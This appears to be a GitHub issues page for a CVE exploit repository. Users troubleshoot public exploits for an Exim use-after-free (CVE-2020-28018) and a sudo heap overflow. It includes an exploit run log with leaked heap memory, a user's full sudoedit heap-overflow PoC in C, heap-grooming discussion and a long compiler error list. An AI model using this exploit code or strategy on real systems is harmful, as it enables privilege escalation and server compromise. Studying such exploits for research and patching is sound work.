lockedbyte / cve-exploits Goto Github PK

Working on trying to get this exploit code to compile and and running into some errors when compiling.

The output of the make can be found: https://pastebin.com/YLamtKEv

The only change I made was removing of malloc.h and replacing with stdlib.h. Any insights?

exim poc send:
[DEBUG] Sending: �2� v
is my configuration not vulnerable?

Trying your Exim POC.. but i'm always this error : Something went wrong initializing encrypted channel ... any advice? :) thanks

Hello lockedbyte,
I'm trying to make your poc work on Sudo 1.8.16, glibc version 2.23 but:
tcache wasn't implemented yet in this glibc ver. , This made the early heap allocation (setlocale) harder due to the short range 0x20-0x80
of Fastbins.

However, I tried setting manual LC variables by order to make the biggest allocation possible and i reached a fast chunk on nearly all bins 0x20 0x30 0x50 0x60 0x80
Sadly I couldn't get more than one 0x80 free chunk in the fast bins because if there was prev. 0x80 chunk freed, it is freed and malloc'ed again by Next LC_Variable...

So only one chunk for each size bin. -> in the end they all got allocated and none of them reached the set_cmnd function
Do you suggest trying to use small bins and others?
or Keep on trying the fast bins strategy,or what?

As for the fuzzer (your fuzz2), It looks like it won't help for the early allocation (i reached nearly 600000 rounds, although small number). Also sanity checks are present on all bins but tcache? (i'm not so sure about that.)
I'm getting sanity check memory corruption errors, and even if i fix that:
The (sudo_hook_entry* struct). is way earlier from any allocation the fuzzer makes.
...............
Screenshot below for some debugging
ubuntu 16.04 glibc 2.23 / sudo 1.8.16
ASLR-> Disabled
https://prnt.sc/yvmzkf

I really appreciate if you could help me, Thanks for your time.

Gr33t1ng5.

First of all thanks for hard work. Appreciated.

I'm trying to reproduce you're PoC, at least for study case.
And it will be awesome if U find few minutes to hint me.

I change few lines of code, like float passing in $rdi to sleep(), and got this:

root@l0c4lh05t:/opt/wokr/PWN/CVE-Exploits/CVE-2020-28018# ./p3w debi.piw 25 127.0.0.1 9999
[i] CVE-2020-28018 Proof-Of-Concept (PoC) exploit by @lockedbyte
[*] Leaking heap addresses...
[+] Connecting to debi.piw:25
220 stand ESMTP Exim 4.92 Sun, 16 May 2021 02:12:40 -0400
[*] Sending EHLO...
[DEBUG] Sending: EHLO host.com

250-stand Hello host.com [192.168.122.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
[*] Initializing an encrypted TLS channel...
[DEBUG] Sending: STARTTLS

220 TLS go ahead
[+] Initialized encrypted channel with debi.piw:25 (AES256-GCM-SHA384)
[+] Server certificates:
	[i] Subject: /C=AU/ST=AUAUAUAU/L=PIW/O=PEW/OU=meow/CN=FAQN/[email protected]
	[i] Issuer: /C=AU/ST=AUAUAUAU/L=PIW/O=PEW/OU=meow/CN=FAQN/[email protected]
[*] Sending EHLO...
[DEBUG] Sending: EHLO host.com

250-stand Hello host.com [192.168.122.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-PRDR
250 HELP
[DEBUG] Sending: MAIL FROM: <>

250 OK
M: <>
[*] Sending pipelined command #1...
[DEBUG] Sending: RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
RCPT TO: postmaster
NO
[*] Closing TLS connection channel...
[*] Sending pipelined command #2...
[DEBUG] Sending: OP

[DEBUG] Sending: RCPT TO: postmaster
RCPT TO: postmaster

250 Accepted
250 Accepted
 postmaster
[*] Sending EHLO...
[DEBUG] Sending: EHLO host.com

250-stand Hello host.com [192.168.122.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
[*] Re-initializing an encrypted TLS channel...
[DEBUG] Sending: STARTTLS

220 TLS go ahead
[+] Initialized encrypted channel with debi.piw:25 (AES256-GCM-SHA384)
[*] Triggering Use-After-Free...
[DEBUG] Sending: NOOP

250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 Accepted
250 OK

[+] Memory leak: 

	0x000000: 32 35 30 20 41 63 63 65 70 74 65 64 0d 0a 32 35 250 Accepted..25
	0x000010: 30 20 41 63 63 65 70 74 65 64 0d 0a 32 35 30 20 0 Accepted..250 
	0x000020: 41 63 63 65 70 74 65 64 0d 0a 32 35 30 20 41 63 Accepted..250 Ac
	0x000030: 63 65 70 74 65 64 0d 0a 32 35 30 20 41 63 63 65 cepted..250 Acce
	0x000040: 70 74 65 64 0d 0a 32 35 30 20 41 63 63 65 70 74 pted..250 Accept
	0x000050: 65 64 0d 0a 32 35 30 20 41 63 63 65 70 74 65 64 ed..250 Accepted
	0x000060: 0d 0a 32 35 30 20 41 63 63 65 70 74 65 64 0d 0a ..250 Accepted..
	0x000070: 32 35 30 20 41 63 63 65 70 74 65 64 0d 0a 32 35 250 Accepted..25
	0x000080: 30 20 4f 4b 0d 0a 00 00 00 00 00 00 00 00 00 00 0 OK............
	0x000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
	0x0000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ............... 

Failed to determinate memleak :(
: Success

Last line of log is failed check of 0x55 in response.
I even try few host from the wild with hardcoded __asm__("int $3"); after function... the same thing.

So, the question is:

 499   │     i = 0;
 500   │     while(i < PIPLN_ITER) {
 501   │         strncat(PIPLN_01_CMD, "RCPT TO: [email protected]\n", MAX_PIPLN_SZ-1);
 502   │         i++;
 503   │     }

Why and how PIPLN_ITER calculated? Why 0x09? Why we need'em at all in that place?

I don't believe to see any reply, but, thanks you again.
Good luck.

Hello,

I'm trying to code my own exploit.
Tested fuzzy.py ... but I can't find an interesting crash...
Find a crash in set_cmnd() .. but no crash in nss_load_library() or process_hooks_getenv()...
Maybe set_cmnd() is a good way .. but I don't find a way to control R15 ..

Any idea ?

For info I'm using:
Linux my-box 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
Sudoers I/O plugin version 1.8.31

Any options to compile sudo 1.8.31 ? I've used --env-debug with ./configure.

Thanks for your help.

Hello there,

Is it possible to provide the data (input and log) for the nss_load_library() crash??

Thank you in advance

your exploit.py, gid_tab is proftpd global variable，but what is tab_x？

Wait a minute!
What's that?

Do u see? But why here? I just don't know what to do, how to sploit'em.
I think we need to look depper inside memory of exim fork wile sending PDU's.

here is what we receive back from exim after sending second part of OP

WoW! What a strange chunk... This is chunk inside chunk!

But what now? Am I need to learn how exim's malloc work? God, noooooo.....

Trying to compile it with the following but doesn't work:
cc -o exploit exploit.c -Wall -Wextra -Werror -lgnutls

Following error is thrown:
exploit.c:108:27: error: initialization of ‘long unsigned int’ from ‘void ’ makes integer from pointer without a cast [-Werror=int-conversion]
108 | unsigned long heap_base = NULL; / we will save here heap base address when leaked */
| ^~~~
exploit.c:109:27: error: initialization of ‘long unsigned int’ from ‘void ’ makes integer from pointer without a cast [-Werror=int-conversion]
109 | unsigned long curr_heap = NULL; / curr heap for config search */
| ^~~~
exploit.c:110:29: error: initialization of ‘long unsigned int’ from ‘void ’ makes integer from pointer without a cast [-Werror=int-conversion]
110 | unsigned long config_addr = NULL; / when finding config address, we will save it here */
| ^~~~
exploit.c: In function ‘init_ctx_x’:
exploit.c:156:5: error: ‘TLSv1_2_client_method’ is deprecated [-Werror=deprecated-declarations]
156 | method = TLSv1_2_client_method();
| ^~~~~~
In file included from /usr/include/openssl/e_os2.h:13,
from /usr/include/openssl/ssl.h:15,
from exploit.c:22:
/usr/include/openssl/ssl.h:1891:1: note: declared here
1891 | DEPRECATEDIN_1_1_0(__owur const SSL_METHOD *TLSv1_2_client_method(void))
| ^~~~~~~~~~~~~~~~~~
exploit.c:156:12: error: assignment discards ‘const’ qualifier from pointer target type [-Werror=discarded-qualifiers]
156 | method = TLSv1_2_client_method();
| ^
exploit.c: In function ‘exchange_data’:
exploit.c:285:4: error: implicit declaration of function ‘hexdump’ [-Werror=implicit-function-declaration]
285 | hexdump(buf, size/16);
| ^~~~~~~
exploit.c:287:4: error: implicit declaration of function ‘identify_leak’ [-Werror=implicit-function-declaration]
287 | identify_leak(buf, size);
| ^~~~~~~~~~~~~
exploit.c:294:4: error: implicit declaration of function ‘identify_config’ [-Werror=implicit-function-declaration]
294 | identify_config(mem_exfil, MAX_POST_PIPLN_SZ);
| ^~~~~~~~~~~~~~~
exploit.c: At top level:
exploit.c:305:6: error: conflicting types for ‘hexdump’ [-Werror]
305 | void hexdump(void mem, unsigned int len) {
| ^~~~~~~
exploit.c:285:4: note: previous implicit declaration of ‘hexdump’ was here
285 | hexdump(buf, size/16);
| ^~~~~~~
exploit.c: In function ‘hexdump’:
exploit.c:318:41: error: implicit declaration of function ‘isprint’ [-Werror=implicit-function-declaration]
318 | else if(isprint(((char)mem)[j]))
| ^~~~~~~
exploit.c: In function ‘strstrx’:
exploit.c:333:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘size_t’ {aka ‘long unsigned int’} [-Werror=sign-compare]
333 | while(i < sz_1) {
| ^
exploit.c:336:7: error: assignment discards ‘const’ qualifier from pointer target type [-Werror=discarded-qualifiers]
336 | f = str1+i;
| ^
exploit.c: At top level:
exploit.c:368:6: error: conflicting types for ‘identify_config’ [-Werror]
368 | void identify_config(char *buf, size_t size) {
| ^~~~~~~~~~~~~~~
exploit.c:294:4: note: previous implicit declaration of ‘identify_config’ was here
294 | identify_config(mem_exfil, MAX_POST_PIPLN_SZ);
| ^~~~~~~~~~~~~~~
exploit.c: In function ‘identify_config’:
exploit.c:370:24: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
370 | unsigned long r_ptr = NULL;
| ^~~~
exploit.c: At top level:
exploit.c:383:6: error: conflicting types for ‘identify_leak’ [-Werror]
383 | void identify_leak(char *buf, size_t size) {
| ^~~~~~~~~~~~~
exploit.c:287:4: note: previous implicit declaration of ‘identify_leak’ was here
287 | identify_leak(buf, size);
| ^~~~~~~~~~~~~
exploit.c: In function ‘identify_leak’:
exploit.c:391:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘size_t’ {aka ‘long unsigned int’} [-Werror=sign-compare]
391 | while(i < size) {
| ^
exploit.c:399:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘long unsigned int’ [-Werror=sign-compare]
399 | while(x < sizeof(uint64_t)) {
| ^
exploit.c:403:7: error: assignment to ‘uint64_t *’ {aka ‘long unsigned int ’} from incompatible pointer type ‘char ()[8]’ [-Werror=incompatible-pointer-types]
403 | leak = &lk;
| ^
exploit.c: In function ‘leak_phase’:
exploit.c:451:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
451 | return;
| ^~~~~~
exploit.c:414:5: note: declared here
414 | int leak_phase(char *hostname, int port) {
| ^~~~~~~~~~
exploit.c:463:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
463 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:466:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
466 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:479:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
479 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:515:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
515 | return;
| ^~~~~~
exploit.c:414:5: note: declared here
414 | int leak_phase(char *hostname, int port) {
| ^~~~~~~~~~
exploit.c:528:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
528 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:418:13: error: unused variable ‘x’ [-Werror=unused-variable]
418 | int i = 0, x = 0;
| ^
exploit.c:417:6: error: unused variable ‘count’ [-Werror=unused-variable]
417 | int count = 0;
| ^~~~~
exploit.c: In function ‘arbitrary_read’:
exploit.c:564:31: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
564 | unsigned long inject_point = NULL;
| ^~~~
exploit.c:589:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
589 | return;
| ^~~~~~
exploit.c:558:5: note: declared here
558 | int arbitrary_read(char *hostname, int port) {
| ^~~~~~~~~~~~~~
exploit.c:592:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
592 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:595:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
595 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:600:17: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
600 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:606:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
606 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:678:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
678 | return;
| ^~~~~~
exploit.c:558:5: note: declared here
558 | int arbitrary_read(char *hostname, int port) {
| ^~~~~~~~~~~~~~
exploit.c:685:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
685 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:564:16: error: unused variable ‘inject_point’ [-Werror=unused-variable]
564 | unsigned long inject_point = NULL;
| ^~~~~~~~~~~~
exploit.c:561:20: error: unused variable ‘l’ [-Werror=unused-variable]
561 | int i = 0, x = 0, l = 0;
| ^
exploit.c:560:17: error: unused variable ‘curr’ [-Werror=unused-variable]
560 | int count = 0, curr = 0;
| ^~~~
exploit.c:560:6: error: unused variable ‘count’ [-Werror=unused-variable]
560 | int count = 0, curr = 0;
| ^~~~~
exploit.c: In function ‘search_config’:
exploit.c:717:10: error: comparison of integer expressions of different signedness: ‘int’ and ‘long unsigned int’ [-Werror=sign-compare]
717 | while(i < (HEAP_RANGE_OFF/READ_SZ)) {
| ^
exploit.c: In function ‘write_what_where’:
exploit.c:748:31: error: initialization of ‘long unsigned int’ from ‘void *’ makes integer from pointer without a cast [-Werror=int-conversion]
748 | unsigned long inject_point = NULL;
| ^~~~
exploit.c:777:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
777 | return;
| ^~~~~~
exploit.c:740:5: note: declared here
740 | int write_what_where(char *hostname, int port, char *injected_config) {
| ^~~~~~~~~~~~~~~~
exploit.c:780:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
780 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:783:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
783 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:788:17: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
788 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 1, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:793:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
793 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:866:3: error: ‘return’ with no value, in function returning non-void [-Werror=return-type]
866 | return;
| ^~~~~~
exploit.c:740:5: note: declared here
740 | int write_what_where(char *hostname, int port, char *injected_config) {
| ^~~~~~~~~~~~~~~~
exploit.c:871:16: error: passing argument 1 of ‘exchange_data’ makes integer from pointer without a cast [-Werror=int-conversion]
871 | exchange_data(ssl, buf, sizeof(buf)-1, 1, 0, TLS_T);
| ^~~
| |
| SSL * {aka struct ssl_st *}
exploit.c:257:25: note: expected ‘long int’ but argument is of type ‘SSL *’ {aka ‘struct ssl_st *’}
257 | void exchange_data(long fd, char *buf, size_t size, int send_flg, int recv_flg, int method_t) {
| ~~~~~^~
exploit.c:745:20: error: unused variable ‘l’ [-Werror=unused-variable]
745 | int i = 0, x = 0, l = 0;
| ^
exploit.c:744:6: error: unused variable ‘curr’ [-Werror=unused-variable]
744 | int curr = 0;
| ^~~~
exploit.c:743:6: error: unused variable ‘count’ [-Werror=unused-variable]
743 | int count = 0;
| ^~~~~
exploit.c: In function ‘main’:
exploit.c:905:12: error: unused variable ‘listener_p’ [-Werror=unused-variable]
905 | pthread_t listener_p = 0;
| ^~~~~~~~~~
cc1: all warnings being treated as errors

hi,
The PoC script did not work with my ubuntu 20.04.1 enviroment , so I try to make my own poc script based on the fuzz and exploit methhod.
For debugging convenience ， I did this with root user. After some works, a poc worked with nss_load_library() method.
But when switch to general user , the script did not work, because the heap chunk I used to overflow was pre allocated and store somethins like groups=4,24,27,30,46,120,131,132,1000
I have no idea why this happened, I want to know what is the difference between running this script through root user and normal user. Looking forward to your help .Thanks!

Here is my poc.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>

#define SUDOEDIT_PATH "/usr/bin/sudoedit"

int main(int argc, char *argv[]) {
 char *s_argv[]={
  "sudoedit",
   "-s",
  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
  "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\",
  NULL
 };

 char *s_envp[]={
  "B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\\", 
  "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\", 
  "X/shell","\\",
  "LC_TELEPHONE=C.UTF-8@Aa3QLwXb3PJLmiDQinnGV9WSiGrxWfRd04R1I2kOLtQyEvuehEJTM7yffnSZwxBdlOaevjyiYbA0wUMP7oPZ",
  "LC_NUMERIC=C.UTF-8@AwuefJrxO4MZdmyVPaVPYnPNVkMkkTZSKDmPTTYlKbE",
  "AgvAS=AKz0",
  NULL
 };

 printf("GOOD LUCK \n");
 printf("%d\n", getuid());
 printf("the pid is: %d\n", getpid());
 for(int i=0;i<10;i++){
     // wait to attach
     printf("%d\n", i);
     sleep(1);
 }
 execve(SUDOEDIT_PATH, s_argv, s_envp);

 return 0;
}

malloc(): invalid size (unsorted)
./exp.sh: line 4: 85244 Aborted ./exploit
[i] Try 6940
[.] crafting payload...
[.] triggering heap overflow...
malloc(): invalid size (unsorted)
./exp.sh: line 4: 85245 Aborted ./exploit
[i] Try 6941
[.] crafting payload...
[.] triggering heap overflow...
malloc(): invalid size (unsorted)
./exp.sh: line 4: 85246 Aborted ./exploit
[i] Try 6942
[.] crafting payload...
[.] triggering heap overflow...
malloc(): invalid size (unsorted)
./exp.sh: line 4: 85247 Aborted

This is the output .

Hi, thanks for your work, it helps me a lot. But I met a problem.
I run the poc in nss_crashes/ with sudo env -i gdb < poc, but I did't get the crash about nss_load_library().
I used the same version of Ubuntu and sudo with yours. The call stack of crash I got:

#1  0x00007fc71c23b859 in __GI_abort () at abort.c:79
#2  0x00007fc71c2a63ee in __libc_message 
#3  0x00007fc71c2ae47c in malloc_printerr
#4  0x00007fc71c2b1234 in _int_malloc 
#5  0x00007fc71c2b32d4 in __GI___libc_malloc (bytes=262148) at malloc.c:3058
#6  0x00007fc71c4342f9 in sudo_getgrouplist2_v1
#7  0x00007fc71b3e4593 in sudo_make_gidlist_item
#8  0x00007fc71b3e333e in sudo_get_gidlist
#9  0x00007fc71b3dd09d in runas_getgroups () at ./match.c:145
#10 0x00007fc71b3ce872 in runas_setgroups () at ./set_perms.c:1714
#11 set_perms (perm=perm@entry=5) at ./set_perms.c:281
#12 0x00007fc71b3c8d5a in sudoers_lookup
#13 0x00007fc71b3d1b41 in sudoers_policy_main 
#14 0x00007fc71b3cb0fa in sudoers_policy_check 
#15 0x000055e79a3e2c46 in policy_check 
#16 main (argc=<optimized out>, argv=<optimized out>, envp=0x7ffd5fed8a98) at ./sudo.c:253

Is there some other configuration I missed?